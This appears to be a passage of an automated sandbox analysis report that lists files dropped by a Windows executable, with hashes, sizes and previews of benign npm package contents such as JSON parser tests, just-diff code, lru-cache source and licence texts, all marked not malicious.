              SHA-512:F3C6F632FBC5E7A0B58E8CC07F8836A95D0C4D98473F9F501F1173E08901375963E6AD35AD2AFD839A53A03945A2DE3B85CF10030B500912CCE09A536DE8088A
              Malicious:false
              Reputation:unknown
              Preview:var test = require('tape');.var Parser = require('../');..var input = '{\n "string": "value",\n "number": 3,\n "object"';.var input2 = ': {\n "key": "v."\n },\n "array": [\n -1,\n 12\n ]\n ';.var input3 = '"null": null, "true": true, "false": false, "frac": 3.14 }';..var offsets = [. [ 0, Parser.C.LEFT_BRACE ],. [ 4, Parser.C.STRING ],. [ 12, Parser.C.COLON ],. [ 14, Parser.C.STRING ],. [ 21, Parser.C.COMMA ],. [ 25, Parser.C.STRING ],. [ 33, Parser.C.COLON ],. [ 35, Parser.C.NUMBER ],. [ 36, Parser.C.COMMA ],. [ 40, Parser.C.STRING ],. [ 48, Parser.C.COLON ],. [ 50, Parser.C.LEFT_BRACE ],. [ 54, Parser.C.STRING ],. [ 59, Parser.C.COLON ],. [ 61, Parser.C.STRING ],. [ 69, Parser.C.RIGHT_BRACE ],. [ 70, Parser.C.COMMA ],. [ 74, Parser.C.STRING ],. [ 81, Parser.C.COLON ],. [ 83, Parser.C.LEFT_BRACKET ],. [ 87, Parser.C.NUMBER ],. [ 89, Parser.C.COMMA ],. [ 93, Parser.C.NUMBER ],. [ 98, Parser.C.RIGHT_BRACKET ],. [ 102, Parser.C.STRING ],. [ 108, Parse
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):1240
              Entropy (8bit):4.812709517509997
              Encrypted:false
              SSDEEP:
              MD5:9C7D4FB73BCA59A7B5183F24039FC497
              SHA1:236D9AD228A0225B94D30670596EB425094A4861
              SHA-256:1A57457B49DD2705171AAF44ED3BCD52E748BFAAAF1D34F2C4D4E0D0F8F185DE
              SHA-512:9BAE9DD3D909E5A2943FF48241C865F57538F4B916B4C660AB5545CE620CCACA7A4DD0599C740AC0670025C184164E9E6A9B956387EE865D144E1CE199FDDD5C
              Malicious:false
              Reputation:unknown
              Preview:var test = require('tape');.var Parser = require('../');..var expected = [. [ [], '' ],. [ [], 'Hello' ],. [ [], 'This"is' ],. [ [], '\r\n\f\t\\/"' ],. [ [], '......' ],. [ [], '\\' ],. [ [], '/' ],. [ [], '"' ],. [ [ 0 ], 0 ],. [ [ 1 ], 1 ],. [ [ 2 ], -1 ],. [ [], [ 0, 1, -1 ] ],. [ [ 0 ], 1 ],. [ [ 1 ], 1.1 ],. [ [ 2 ], -1.1 ],. [ [ 3 ], -1 ],. [ [], [ 1, 1.1, -1.1, -1 ] ],. [ [ 0 ], -1 ],. [ [], [ -1 ] ],. [ [ 0 ], -0.1 ],. [ [], [ -0.1 ] ],. [ [ 0 ], 6.02e+23 ],. [ [], [ 6.02e+23 ] ],. [ [ 0 ], '7161093205057351174' ],. [ [], [ '7161093205057351174'] ].];..test('primitives', function (t) {. t.plan(25);.. var p = new Parser();. p.onValue = function (value) {. var keys = this.stack. .slice(1). .map(function (item) { return item.key }). .concat(this.key !== undefined ? this.key : []). ;. t.deepEqual(. [ keys, value ],. expected.shift(). );. };.. p.write('"""Hello""This\\"is""\\r\\n\\f\\t\\\\\\/\\""');. p.write('
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):451
              Entropy (8bit):4.823390929241496
              Encrypted:false
              SSDEEP:
              MD5:8CF7D3CD0DB5B1C5F1383178280F45A5
              SHA1:04EEC2033CDF19BA6439239038D0A87B590EF11F
              SHA-256:1CF4CF0FADBCEE78553C6B7C666073CBB034691FCAE60846631B7280EB2361B6
              SHA-512:DE25ED7F1B91094A895FC2454B273248DD02CCCA730E2A3E7395B3F376D16933ED2EF3A6699D82C50651382B9208D211B0BB80F0BC9620D3DDAA4C0D936344FA
              Malicious:false
              Reputation:unknown
              Preview:var test = require('tape');.var Parser = require('../');..test('parse surrogate pair', function (t) {. t.plan(1);.. var p = new Parser();. p.onValue = function (value) {. t.equal(value, '..');. };.. p.write('"\\uD83D\\uDE0B"');.});..test('parse chunked surrogate pair', function (t) {. t.plan(1);.. var p = new Parser();. p.onValue = function (value) {. t.equal(value, '..');. };.. p.write('"\\uD83D');. p.write('\\uDE0B"');.});..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):251
              Entropy (8bit):4.545899247849345
              Encrypted:false
              SSDEEP:
              MD5:27FF62B5FB5E3619048A0B33AE82055C
              SHA1:401E2662D4390FD2FB63EF789708C58F3AFC5472
              SHA-256:5E2E10C9F6A8D749351CD6EA6E06F356ECB9439069365D460F941D9871D5F0F1
              SHA-512:F880319809609175FE2F3FEB4CB36658083F4AD239F300736A01180F896E283E349C55F8C136E55C05188D85C32FE1F08A06EFE04B90D64197A6BC73521BD586
              Malicious:false
              Reputation:unknown
              Preview:var test = require('tape');.var Parser = require('../');..test('unvalid', function (t) {. var count = 0;.. var p = new Parser();. p.onError = function (value) {. count++;. t.equal(1, count);. t.end();. };.. p.write('{"test": eer[');.});.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):705
              Entropy (8bit):4.975099215484967
              Encrypted:false
              SSDEEP:
              MD5:37002B8D33FC95618645036ED58062F3
              SHA1:4A0D4CC955CC01853C5E75BFB8F5FC68ACD6DFD1
              SHA-256:1FEED5191CD2507E425D83A26672582E92C9B7A8B2C822D25D525CB0DD87D249
              SHA-512:D8BF435C9CE0D7F051B04A0E9456B1F1372AAD7D9ADFB03EA6E3E455DA988ECB3768E915114676F6551C01D11217633A5249197D8FF0194DB4F08DAF07C1DB44
              Malicious:false
              Reputation:unknown
              Preview:var test = require('tape');.var Parser = require('../');..test('3 bytes of utf8', function (t) {. t.plan(1);.. var p = new Parser();. p.onValue = function (value) {. t.equal(value, '...');. };.. p.write('"..."');.});..test('utf8 snowman', function (t) {. t.plan(1);.. var p = new Parser();. p.onValue = function (value) {. t.equal(value, '.');. };.. p.write('"."');.});..test('utf8 with regular ascii', function (t) {. t.plan(4);.. var p = new Parser();. var expected = [ "snow: .!", "xyz", ".que!" ];. expected.push(expected.slice());.. p.onValue = function (value) {. t.deepEqual(value, expected.shift());. };.. p.write('["snow: .!","xyz",".que!"]');.});.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4471
              Entropy (8bit):4.8860812993608
              Encrypted:false
              SSDEEP:
              MD5:AEBE973337CC7F412A8FD0961E89081F
              SHA1:49D1F6F8E048B7A4360DF6069F86DD5163E17821
              SHA-256:1AE0CD18C45BC56B0BDE1082936FB3E2393B970393D51AC5EEB167AF6A88FAE4
              SHA-512:61998C24CF2914BD7C38445894275AE5A8F0F4E26A8A55026E5617F4BF5B8DDD59149B6AAD662191508810ABE3675103B5D9ACC729C7E24DF59B1C589B3F2AB3
              Malicious:false
              Reputation:unknown
              Preview:module.exports = {. diffApply: diffApply,. jsonPatchPathConverter: jsonPatchPathConverter,.};../*. const obj1 = {a: 3, b: 5};. diffApply(obj1,. [. { "op": "remove", "path": ['b'] },. { "op": "replace", "path": ['a'], "value": 4 },. { "op": "add", "path": ['c'], "value": 5 }. ]. );. obj1; // {a: 4, c: 5}.. // using converter to apply jsPatch standard paths. // see http://jsonpatch.com. import {diff, jsonPatchPathConverter} from 'just-diff'. const obj2 = {a: 3, b: 5};. diffApply(obj2, [. { "op": "remove", "path": '/b' },. { "op": "replace", "path": '/a', "value": 4 }. { "op": "add", "path": '/c', "value": 5 }. ], jsonPatchPathConverter);. obj2; // {a: 4, c: 5}.. // arrays. const obj3 = {a: 4, b: [1, 2, 3]};. diffApply(obj3, [. { "op": "replace", "path": ['a'], "value": 3 }. { "op": "replace", "path": ['b', 2], "value": 4 }. { "op": "add", "path": ['b', 3], "value": 9 }. ]);. obj3; // {a: 3, b: [1, 2, 4, 9]}.. // nested paths. con
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4419
              Entropy (8bit):4.8828087185887465
              Encrypted:false
              SSDEEP:
              MD5:E8C135BC10954325B4E59B26286A4EC7
              SHA1:34B2C6832684A8532FB60A7F974397CB5610A6DB
              SHA-256:33C49907380228108B41C41F580143854CC0AFBED7C2090CF466F886DD62445B
              SHA-512:6D0C900C21E9EF3489E76F3D35C6757FBE6A00B6DD748C748387B5F3E1AEB408E2AB2AD9A13401B695CAB0B6E3BB255CFC3CA3D96C7854001CA73DC33180687B
              Malicious:false
              Reputation:unknown
              Preview:/*. const obj1 = {a: 3, b: 5};. diffApply(obj1,. [. { "op": "remove", "path": ['b'] },. { "op": "replace", "path": ['a'], "value": 4 },. { "op": "add", "path": ['c'], "value": 5 }. ]. );. obj1; // {a: 4, c: 5}.. // using converter to apply jsPatch standard paths. // see http://jsonpatch.com. import {diff, jsonPatchPathConverter} from 'just-diff'. const obj2 = {a: 3, b: 5};. diffApply(obj2, [. { "op": "remove", "path": '/b' },. { "op": "replace", "path": '/a', "value": 4 }. { "op": "add", "path": '/c', "value": 5 }. ], jsonPatchPathConverter);. obj2; // {a: 4, c: 5}.. // arrays. const obj3 = {a: 4, b: [1, 2, 3]};. diffApply(obj3, [. { "op": "replace", "path": ['a'], "value": 3 }. { "op": "replace", "path": ['b', 2], "value": 4 }. { "op": "add", "path": ['b', 3], "value": 9 }. ]);. obj3; // {a: 3, b: [1, 2, 4, 9]}.. // nested paths. const obj4 = {a: 4, b: {c: 3}};. diffApply(obj4, [. { "op": "replace", "path": ['a'], "value": 5
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):759
              Entropy (8bit):4.592161728603168
              Encrypted:false
              SSDEEP:
              MD5:5E9F9C0328FAC8054BFC6B318401A28D
              SHA1:26D39D00F0FC1DDFE4974DBE69691F9C09AD9036
              SHA-256:1B721A43B3CFF361A573C58E9769CCDC4350351D07D91CE69B72A2363406E61A
              SHA-512:B349B2AF82288563221F9BBF6BF4926F74C2C4609DDBF0BFBF370A3B518A947532ECC5927FCEA200629ABC912531188D78232F078502B532DD2568DF6C855B80
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "just-diff-apply",. "version": "5.5.0",. "description": "Apply a diff to an object. Optionally supports jsonPatch protocol",. "type": "module",. "exports": {. ".": {. "types": "./index.d.ts",. "require": "./index.cjs",. "import": "./index.mjs". },. "./package.json": "./package.json". },. "main": "index.cjs",. "types": "index.d.ts",. "scripts": {. "test": "echo \"Error: no test specified\" && exit 1",. "build": "rollup -c". },. "repository": "https://github.com/angus-c/just",. "keywords": [. "object",. "diff",. "apply",. "jsonPatch",. "no-dependencies",. "just". ],. "author": "Angus Croll",. "license": "MIT",. "bugs": {. "url": "https://github.com/angus-c/just/issues". }.}
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):120
              Entropy (8bit):4.668029761840334
              Encrypted:false
              SSDEEP:
              MD5:034A283586FC4A45C64E2BA2BFD5F2E6
              SHA1:46F0E8BF5B85350C5176F2F990FEA1CDBD8E4348
              SHA-256:1852412BFDB6E4BC898B8C0E323A4FF5C7EA3C16BB74F946E5FE0691F9A59F48
              SHA-512:0EE47C7770E51819B5BF83DE8E3F68DF0C9F09B91B08644ADC0E8AFC2A4B3635DBD71F915385706609D197CF9A7220FAE784C225A8A7DEE861F67C4E92C8A14E
              Malicious:false
              Reputation:unknown
              Preview:const createRollupConfig = require('../../config/createRollupConfig');..module.exports = createRollupConfig(__dirname);.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1078
              Entropy (8bit):5.100987827793102
              Encrypted:false
              SSDEEP:
              MD5:9A101E543AED27CD8558F6376292442E
              SHA1:07A19AB9F07A8120E39CE09C4CD7703584241285
              SHA-256:EBB30D70F7EBD918F223CE6ED7621FA4CEF3EC2D59D6707C23868B01DEF28CE2
              SHA-512:199E1CB24AB93EEDB217FB4ACD3B0399F4209F1F7BE507545B71EEF288885252697AF1226C06A096ABA695C8846E41D1B885641C958AD6942924F340C4674467
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) 2016 angus croll..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5979
              Entropy (8bit):4.805587491072073
              Encrypted:false
              SSDEEP:
              MD5:B156590F03DF08EB80107B419FC541D7
              SHA1:EE75208454872DE7E85E4FBEC9F8FDC3895C7D17
              SHA-256:1B73FFB5CBA2F5BA219EF8FFF57F9B34F77D7DD4B0229F6396C022F796E7993D
              SHA-512:F49FFFA1AF9D9DDD9A8D66188DE9973439D74A26B0C7BE7F8CFB3392707F9EAE083DDDB50EDD4377BB8B0FD9A394D479AC3D84DD3B48B7EE392BDD06ADCC326B
              Malicious:false
              Reputation:unknown
              Preview:module.exports = {. diff: diff,. jsonPatchPathConverter: jsonPatchPathConverter,.};../*. const obj1 = {a: 4, b: 5};. const obj2 = {a: 3, b: 5};. const obj3 = {a: 4, c: 5};.. diff(obj1, obj2);. [. { "op": "replace", "path": ['a'], "value": 3 }. ].. diff(obj2, obj3);. [. { "op": "remove", "path": ['b'] },. { "op": "replace", "path": ['a'], "value": 4 }. { "op": "add", "path": ['c'], "value": 5 }. ].. // using converter to generate jsPatch standard paths. // see http://jsonpatch.com. import {diff, jsonPatchPathConverter} from 'just-diff'. diff(obj1, obj2, jsonPatchPathConverter);. [. { "op": "replace", "path": '/a', "value": 3 }. ].. diff(obj2, obj3, jsonPatchPathConverter);. [. { "op": "remove", "path": '/b' },. { "op": "replace", "path": '/a', "value": 4 }. { "op": "add", "path": '/c', "value": 5 }. ].. // arrays. const obj4 = {a: 4, b: [1, 2, 3]};. const obj5 = {a: 3, b: [1, 2, 4]};. const obj6 = {a: 3, b: [1, 2, 4, 5]};.. diff(obj4, obj
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5932
              Entropy (8bit):4.802797942019657
              Encrypted:false
              SSDEEP:
              MD5:FDC71FA90CDDC5D6499E976A92A190F4
              SHA1:71DFC77BF6A66F948A2363B5CA052F743FE1A880
              SHA-256:2D3EEF1B11E8DA9DCD695711F8FE468B7320058652196B82290C53321CECFB93
              SHA-512:6C6BC8CC2F2D2FB82CEDB223C03EA925E389536DF8C01F0B6E14FAD9D2FAF64245B95FDA9772262848ADF482123917A18821802C7E80E7F838F37ABCB973BEFE
              Malicious:false
              Reputation:unknown
              Preview:/*. const obj1 = {a: 4, b: 5};. const obj2 = {a: 3, b: 5};. const obj3 = {a: 4, c: 5};.. diff(obj1, obj2);. [. { "op": "replace", "path": ['a'], "value": 3 }. ].. diff(obj2, obj3);. [. { "op": "remove", "path": ['b'] },. { "op": "replace", "path": ['a'], "value": 4 }. { "op": "add", "path": ['c'], "value": 5 }. ].. // using converter to generate jsPatch standard paths. // see http://jsonpatch.com. import {diff, jsonPatchPathConverter} from 'just-diff'. diff(obj1, obj2, jsonPatchPathConverter);. [. { "op": "replace", "path": '/a', "value": 3 }. ].. diff(obj2, obj3, jsonPatchPathConverter);. [. { "op": "remove", "path": '/b' },. { "op": "replace", "path": '/a', "value": 4 }. { "op": "add", "path": '/c', "value": 5 }. ].. // arrays. const obj4 = {a: 4, b: [1, 2, 3]};. const obj5 = {a: 3, b: [1, 2, 4]};. const obj6 = {a: 3, b: [1, 2, 4, 5]};.. diff(obj4, obj5);. [. { "op": "replace", "path": ['a'], "value": 3 }. { "op": "replace", "path
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):763
              Entropy (8bit):4.594794837300674
              Encrypted:false
              SSDEEP:
              MD5:FF6D2F8644355E80B09E87918CF4B091
              SHA1:396A274E87B3AD6A3704A76CF18FBB2A9DD45ADA
              SHA-256:1DF75D52A92778B327EC79137008038E49FCBB35F1B6518F6FFBEBA86D797A3B
              SHA-512:22B85204D862A4E9CDAD98E8F59B4DE43FA8B866478E770BEA4E1E9092B70B28C38E183BBC39EE8A965A96D7CC4EC4D79CC99551A1F9F72CEA8415FC4DAF3F16
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "just-diff",. "version": "6.0.2",. "description": "Return an object representing the diffs between two objects. Supports jsonPatch protocol",. "type": "module",. "exports": {. ".": {. "types": "./index.d.ts",. "require": "./index.cjs",. "import": "./index.mjs". },. "./package.json": "./package.json". },. "main": "index.cjs",. "types": "index.d.ts",. "scripts": {. "test": "echo \"Error: no test specified\" && exit 1",. "build": "rollup -c". },. "repository": "https://github.com/angus-c/just",. "keywords": [. "object",. "diff",. "jsonPatch",. "no-dependencies",. "just". ],. "author": "Angus Croll",. "license": "MIT",. "bugs": {. "url": "https://github.com/angus-c/just/issues". }.}
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):775
              Entropy (8bit):5.054477382320076
              Encrypted:false
              SSDEEP:
              MD5:28B53F8938BB3CF7C37ED8AC5E7D233E
              SHA1:33549C74C7488E39D6403D540471B6218295D1C7
              SHA-256:451EC07EEB9C4E1B86DE9ABDAA426462A8BE48F887EC7421CF0BBB9C769555AB
              SHA-512:425D58B2E1CAD367F67792E2EED0CF203A0CECED1BBA2AE0FEB23F3C322FF8535EAE35CA4F6772389CDAC4891B32B7F772161C1336F9151590B178404B46D2A9
              Malicious:false
              Reputation:unknown
              Preview:The ISC License..Copyright (c) 2010-2023 Isaac Z. Schlueter and Contributors..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR.IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text, with very long lines (348)
              Category:dropped
              Size (bytes):49524
              Entropy (8bit):4.222202624851877
              Encrypted:false
              SSDEEP:
              MD5:C04BC0134C8F78B37FAFF02F14F57B89
              SHA1:E0D511838CE8907C5FC9F1181754CB2BFBE2969E
              SHA-256:40A361EE449C9465F72106EC898B8F9F36262E1FA0A85BA453225FB8E0912205
              SHA-512:D3A307D65FA86537634F7B392B10F4BA819687F699BDE17A53F9BEE65560A145DAAAAB29AC2C6474238A3AF50E907E63A9949590E9CFFA0CE89A524E3C877A20
              Malicious:false
              Reputation:unknown
              Preview:"use strict";./**. * @module LRUCache. */.Object.defineProperty(exports, "__esModule", { value: true });.exports.LRUCache = void 0;.const perf = typeof performance === 'object' &&. performance &&. typeof performance.now === 'function'. ? performance. : Date;.const warned = new Set();./* c8 ignore start */.const PROCESS = (typeof process === 'object' && !!process ? process : {});./* c8 ignore start */.const emitWarning = (msg, type, code, fn) => {. typeof PROCESS.emitWarning === 'function'. ? PROCESS.emitWarning(msg, type, code, fn). : console.error(`[${code}] ${type}: ${msg}`);.};.let AC = globalThis.AbortController;.let AS = globalThis.AbortSignal;./* c8 ignore start */.if (typeof AC === 'undefined') {. //@ts-ignore. AS = class AbortSignal {. onabort;. _onabort = [];. reason;. aborted = false;. addEventListener(_, fn) {. this._onabort.push(fn);. }. };. //@ts-ignore. AC = class AbortControl
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (16101)
              Category:dropped
              Size (bytes):16140
              Entropy (8bit):5.226407611102327
              Encrypted:false
              SSDEEP:
              MD5:924D4B9FEC287B3E3D7481B71E095716
              SHA1:3A19D77787E0ED1762835A26C9DEAD5FA585C42A
              SHA-256:A6705394E7FEEC16D609AAFB7B17A13CC2B94D3049259ADA1A316DB6ABB02BA0
              SHA-512:0CA43FD605EB0676EC37CB9AB584ED62FDA999DA8043C22E129BCA78479E7F1548BF581ECBE4F9A0E240AB56145C9FA9C4EFE075EEF97F44370BA48026B42AD5
              Malicious:false
              Reputation:unknown
              Preview:"use strict";var x=(o,t,e)=>{if(!t.has(o))throw TypeError("Cannot "+e)};var j=(o,t,e)=>(x(o,t,"read from private field"),e?e.call(o):t.get(o)),I=(o,t,e)=>{if(t.has(o))throw TypeError("Cannot add the same private member more than once");t instanceof WeakSet?t.add(o):t.set(o,e)},D=(o,t,e,i)=>(x(o,t,"write to private field"),i?i.call(o,e):t.set(o,e),e);Object.defineProperty(exports,"__esModule",{value:!0});exports.LRUCache=void 0;var v=typeof performance=="object"&&performance&&typeof performance.now=="function"?performance:Date,N=new Set,L=typeof process=="object"&&process?process:{},P=(o,t,e,i)=>{typeof L.emitWarning=="function"?L.emitWarning(o,t,e,i):console.error(`[${e}] ${t}: ${o}`)},W=globalThis.AbortController,M=globalThis.AbortSignal;if(typeof W>"u"){M=class{onabort;_onabort=[];reason;aborted=!1;addEventListener(i,s){this._onabort.push(s)}},W=class{constructor(){t()}signal=new M;abort(i){if(!this.signal.aborted){this.signal.reason=i,this.signal.aborted=!0;for(let s of this.signal.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text, with very long lines (348)
              Category:dropped
              Size (bytes):49398
              Entropy (8bit):4.217441440658494
              Encrypted:false
              SSDEEP:
              MD5:B65D65B32BD941CA287BFB6D6849FB4F
              SHA1:6445D781011E2C5599695DA4DA78234F343CD9CF
              SHA-256:B9F48688865BCED458FD81C52BFADF5DD31C2DCB779F293D9D46027418D1C329
              SHA-512:34BD06100BB5BD7689B710EFA5990C43D8A92F479DE747D04D59318E3E90924AFAD8128107DF8ADF6CB745A85BD7D2DDD76292F94B9E20B97A94FC68215BCD1F
              Malicious:false
              Reputation:unknown
              Preview:/**. * @module LRUCache. */.const perf = typeof performance === 'object' &&. performance &&. typeof performance.now === 'function'. ? performance. : Date;.const warned = new Set();./* c8 ignore start */.const PROCESS = (typeof process === 'object' && !!process ? process : {});./* c8 ignore start */.const emitWarning = (msg, type, code, fn) => {. typeof PROCESS.emitWarning === 'function'. ? PROCESS.emitWarning(msg, type, code, fn). : console.error(`[${code}] ${type}: ${msg}`);.};.let AC = globalThis.AbortController;.let AS = globalThis.AbortSignal;./* c8 ignore start */.if (typeof AC === 'undefined') {. //@ts-ignore. AS = class AbortSignal {. onabort;. _onabort = [];. reason;. aborted = false;. addEventListener(_, fn) {. this._onabort.push(fn);. }. };. //@ts-ignore. AC = class AbortController {. constructor() {. warnACPolyfill();. }. signal = new AS();.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (16012)
              Category:dropped
              Size (bytes):16051
              Entropy (8bit):5.224260686294976
              Encrypted:false
              SSDEEP:
              MD5:38188F65598611E00E63661BB3CC1851
              SHA1:1E943161B5B1F53CB522A6E3437BF950A7946544
              SHA-256:3E9121ECCB24F8B90F9204E8BC025F99F5256A3CE887773B6CDD2B4FAAC218F5
              SHA-512:3111B7308CFF720B52D624F5CE09583AF3A957C87ABDE1721169F3BFB4BD3748E9DC9D964188DA58A0F2ECCC8D01F02B2327B782C4F0750D149F9EC3B4BA4DEA
              Malicious:false
              Reputation:unknown
              Preview:var U=(o,t,e)=>{if(!t.has(o))throw TypeError("Cannot "+e)};var I=(o,t,e)=>(U(o,t,"read from private field"),e?e.call(o):t.get(o)),j=(o,t,e)=>{if(t.has(o))throw TypeError("Cannot add the same private member more than once");t instanceof WeakSet?t.add(o):t.set(o,e)},D=(o,t,e,i)=>(U(o,t,"write to private field"),i?i.call(o,e):t.set(o,e),e);var v=typeof performance=="object"&&performance&&typeof performance.now=="function"?performance:Date,M=new Set,L=typeof process=="object"&&process?process:{},P=(o,t,e,i)=>{typeof L.emitWarning=="function"?L.emitWarning(o,t,e,i):console.error(`[${e}] ${t}: ${o}`)},W=globalThis.AbortController,N=globalThis.AbortSignal;if(typeof W>"u"){N=class{onabort;_onabort=[];reason;aborted=!1;addEventListener(i,s){this._onabort.push(s)}},W=class{constructor(){t()}signal=new N;abort(i){if(!this.signal.aborted){this.signal.reason=i,this.signal.aborted=!0;for(let s of this.signal._onabort)s(i);this.signal.onabort?.(i)}}};let o=L.env?.LRU_CACHE_IGNORE_AC_WARNING!=="1",t=(
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2690
              Entropy (8bit):4.630823652763881
              Encrypted:false
              SSDEEP:
              MD5:E73F0034A24E2685CF7129C8FD3BD39F
              SHA1:2CC7EB1A37EF8D85416F0DE8B530B1AC06F95A21
              SHA-256:E1FC90769F98B4E6061DA640BECB81E4F75BCD09DD5E30056C9A1D0179DD4FFD
              SHA-512:E95BB4C8F3C204906D660D37F9DAE40EC7698DBECC213E1C74E3D10F0C9C6E95541D97CA567A0F58A577A552E09DF62907D62D94E5321AD4F11C906F99826ACF
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "lru-cache",. "description": "A cache object that deletes the least-recently-used items.",. "version": "10.0.1",. "author": "Isaac Z. Schlueter <i@izs.me>",. "keywords": [. "mru",. "lru",. "cache". ],. "sideEffects": false,. "scripts": {. "build": "npm run prepare",. "preprepare": "rm -rf dist",. "prepare": "tsc -p tsconfig.json && tsc -p tsconfig-esm.json",. "postprepare": "bash fixup.sh",. "pretest": "npm run prepare",. "presnap": "npm run prepare",. "test": "c8 tap",. "snap": "c8 tap",. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags",. "format": "prettier --write .",. "typedoc": "typedoc --tsconfig tsconfig-esm.json ./src/*.ts",. "benchmark-results-typedoc": "bash scripts/benchmark-results-typedoc.sh",. "prebenchmark": "npm run prepare",. "benchmark": "make -C benchmark",. "preprofile": "npm run prepare",. "profile": "make -C benchmark profile
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):16363
              Entropy (8bit):4.54072587325926
              Encrypted:false
              SSDEEP:
              MD5:72389A9BA22ED5F4B5DA1AFC66D3C735
              SHA1:82979280BDB4E866D5282269B1144122E2C2ECB1
              SHA-256:409F7276C0535E1107611A1479A5A3EDFBA2F315784E138E3B1A7F8F37E40887
              SHA-512:54E19B09341CDEF71D738329C22D25D87164A32182B6C89E50C45A1AA3CBFB72D4E2C2F9608CD9B79746F57682E3F39FB89D3DACBC32057C57EB3FEE1883CDF5
              Malicious:false
              Reputation:unknown
              Preview:const { Request, Response } = require('minipass-fetch').const { Minipass } = require('minipass').const MinipassFlush = require('minipass-flush').const cacache = require('cacache').const url = require('url')..const CachingMinipassPipeline = require('../pipeline.js').const CachePolicy = require('./policy.js').const cacheKey = require('./key.js').const remote = require('../remote.js')..const hasOwnProperty = (obj, prop) => Object.prototype.hasOwnProperty.call(obj, prop)..// allow list for request headers that will be written to the cache index.// note: we will also store any request headers.// that are named in a response's vary header.const KEEP_REQUEST_HEADERS = [. 'accept-charset',. 'accept-encoding',. 'accept-language',. 'accept',. 'cache-control',.]..// allow list for response headers that will be written to the cache index.// note: we must not store the real response's age header, or when we load.// a cache policy based on the metadata it will think the cached response.// is al
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):284
              Entropy (8bit):4.747933374376813
              Encrypted:false
              SSDEEP:
              MD5:15243D6440C12BA337476B4F1BC68708
              SHA1:BB4105CD8D96B2F170807956329E6B00B8998105
              SHA-256:5E8A91F9E801E9EB81E00C52451C7FE4E354674CDD671713299F392DDC8FF324
              SHA-512:38CB4AA0C45134F23E1C0A59C8A69156947A4DA97CFFE74AC2D652A54737182B2DF98CFBBF8CF9D014BBEB27CEAA7365A20338AF1C3633C24D1704FFC54C5F73
              Malicious:false
              Reputation:unknown
              Preview:class NotCachedError extends Error {. constructor (url) {. /* eslint-disable-next-line max-len */. super(`request to ${url} failed: cache mode is 'only-if-cached' but no cached response is available.`). this.code = 'ENOTCACHED'. }.}..module.exports = {. NotCachedError,.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):430
              Entropy (8bit):4.705646700434117
              Encrypted:false
              SSDEEP:
              MD5:774B609F4E0825FF5DC6760A15C9FFD4
